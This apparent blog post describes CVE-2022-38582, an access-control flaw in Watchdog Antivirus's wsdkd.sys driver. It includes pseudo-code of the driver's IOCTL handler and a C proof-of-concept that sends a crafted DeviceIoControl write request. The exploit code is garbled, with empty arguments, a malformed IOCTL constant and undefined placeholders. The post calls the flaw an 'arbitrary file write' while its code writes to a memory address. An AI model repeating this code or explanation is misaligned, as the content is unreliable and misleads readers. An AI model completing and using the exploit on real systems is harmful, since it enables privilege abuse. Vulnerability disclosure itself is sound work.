CVE-2022-38582: Watchdog Antivirus' Anti-Virus Driver wsdkd.sys Vulnerable to Arbitrary File Write Attacks

A newly discovered security vulnerability, CVE-2022-38582, has been found in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158. This vulnerability is caused by incorrect access control, allowing attackers to write arbitrary files and potentially compromise your system's security. In this post, we will explore the details of this vulnerability and share code snippets and references to help you understand the exploit and protect your devices.

CVE-2022-38582 Details

The CVE-2022-38582 vulnerability results from incorrect access control in the anti-virus driver, wsdkd.sys, of Watchdog Antivirus v1.4.158. Attackers can take advantage of this vulnerability to write arbitrary files on your system. This can lead to a range of potential attacks, from data corruption to unauthorized access to sensitive information.

Exploit Details

The vulnerability resides in the IOCTL (Input/Output Control) handling function within the wsdkd.sys driver of Watchdog Antivirus v1.4.158. The following code snippet demonstrates the flaw:

NTSTATUS WsIoDispatchRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) {
    ...
    case IOCTL_WSDKD_VM_WRITE:
        ...
        WsVmWriteBuffer(...);
        ...
        break;
    ...
}

Notice that WsIoDispatchRoutine function processes an IOCTL request with the IOCTL_WSDKD_VM_WRITE code, which calls the WsVmWriteBuffer function. However, there is no security check or access control mechanism in place to verify if the caller has legitimate access rights before writing data to a specified buffer. This allows an attacker to send a crafted IOCTL request to the anti-virus driver, leading to arbitrary file writes.

To exploit this vulnerability, an attacker can craft a low-integrity process that sends an IOCTL request to the wsdkd.sys driver using the DeviceIoControl function, as shown below:

#include <Windows.h>

int main() {
    HANDLE hDevice = CreateFileW(L"\\\\.\\WsKdDevice",
                                  GENERIC_READ | GENERIC_WRITE,
                                  ,
                                  NULL,
                                  OPEN_EXISTING,
                                  FILE_ATTRIBUTE_NORMAL,
                                  NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Could not open device (Error: %d)\n", GetLastError());
        return 1;
    }

    DWORD dwBytesReturned = ;
    DWORD64 dwBuffer[2] = { target_address, source_buffer_address };

    BOOL bResult = DeviceIoControl(hDevice,
                                   x833201C,  // IOCTL_WSDKD_VM_WRITE
                                   &dwBuffer,
                                   sizeof(dwBuffer),
                                   NULL,
                                   ,
                                   &dwBytesReturned,
                                   NULL);

    ...
}

Original References

1. National Vulnerability Database CVE details: CVE-2022-38582
2. Watchdog Antivirus official website: https://www.watchdogdevelopment.com

Conclusion

The CVE-2022-38582 vulnerability in the anti-virus driver wsdkd.sys of Watchdog Antivirus v1.4.158 is a serious security risk, as it allows attackers to write arbitrary files on your system. By understanding the exploit details and keeping your software up-to-date, you can protect your devices and maintain your system's security.

Timeline

Published on: 11/04/2022 12:15:00 UTC
Last modified on: 11/08/2022 15:59:00 UTC